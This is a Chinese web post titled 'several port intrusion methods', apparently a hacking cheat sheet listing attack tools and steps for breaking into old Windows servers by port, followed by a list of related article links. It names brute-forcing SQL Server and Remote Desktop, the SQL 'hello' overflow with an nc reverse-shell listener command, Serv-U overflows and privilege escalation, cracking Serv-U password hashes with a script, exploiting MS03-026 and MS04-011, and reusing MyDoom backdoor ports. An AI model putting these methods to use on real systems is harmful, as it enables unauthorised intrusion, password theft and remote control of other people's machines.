当前位置: 首页 > news >正文

几种端口入侵方法

1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPas*.**e 进行字典暴破(字典是关键)
最后 SQLTool*.**e入侵
=============================
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(小榕的注入软件)。

5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
======================================
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

6. 554端口
用real554.exe入侵。

7. 6129端口
用DameWare6129.exe入侵。

8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。

9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

相关文章:

  • 交换机/路由器/防火墙支持的命令
  • 华为交换机、路由器命令集
  • Cisco路由器入侵
  • WEBSHELL权限重启服务器的方法
  • asp上传过滤代码(强)
  • Fckeditor 2.4.2 php任意上传文件漏洞+修补方法
  • 内网渗透利器--reDuh
  • linux入侵的基本命令
  • 常见虚拟主机目录对照
  • XSRF 跨站请求伪造
  • Linux安装软件有关的命令(dpkg 安装deb包)
  • 最炫的万能溢出武器——“Metasploit”
  • Metasploit Framework 简单介绍
  • DNS+tunnel(DNS隧道)技术-DNS2tcp的使用方法及原理
  • 变态的Web服务器IIS安全设置
  • 【vuex入门系列02】mutation接收单个参数和多个参数
  • 4个实用的微服务测试策略
  • CSS选择器——伪元素选择器之处理父元素高度及外边距溢出
  • Druid 在有赞的实践
  • HTTP传输编码增加了传输量,只为解决这一个问题 | 实用 HTTP
  • Python学习之路16-使用API
  • Shadow DOM 内部构造及如何构建独立组件
  • v-if和v-for连用出现的问题
  • 包装类对象
  • 看完九篇字体系列的文章,你还觉得我是在说字体?
  • 判断客户端类型,Android,iOS,PC
  • 普通函数和构造函数的区别
  • 使用权重正则化较少模型过拟合
  • 数据科学 第 3 章 11 字符串处理
  • 用jQuery怎么做到前后端分离
  • NLPIR智能语义技术让大数据挖掘更简单
  • !!java web学习笔记(一到五)
  • # 执行时间 统计mysql_一文说尽 MySQL 优化原理
  • #includecmath
  • #mysql 8.0 踩坑日记
  • #NOIP 2014# day.1 T2 联合权值
  • (1)(1.9) MSP (version 4.2)
  • (C语言)球球大作战
  • (Python) SOAP Web Service (HTTP POST)
  • (二)【Jmeter】专栏实战项目靶场drupal部署
  • (二)Pytorch快速搭建神经网络模型实现气温预测回归(代码+详细注解)
  • (五)c52学习之旅-静态数码管
  • (原创)攻击方式学习之(4) - 拒绝服务(DOS/DDOS/DRDOS)
  • ... fatal error LINK1120:1个无法解析的外部命令 的解决办法
  • .net 4.0 A potentially dangerous Request.Form value was detected from the client 的解决方案
  • .NET 4.0中使用内存映射文件实现进程通讯
  • .net 验证控件和javaScript的冲突问题
  • .Net 知识杂记
  • @JsonFormat与@DateTimeFormat注解的使用
  • @RequestBody与@ModelAttribute
  • @Transient注解
  • [Android]竖直滑动选择器WheelView的实现
  • [BUUCTF]-PWN:wustctf2020_number_game解析(补码,整数漏洞)
  • [CQOI 2011]动态逆序对
  • [Delphi]一个功能完备的国密SM4类(TSM4)[20230329更新]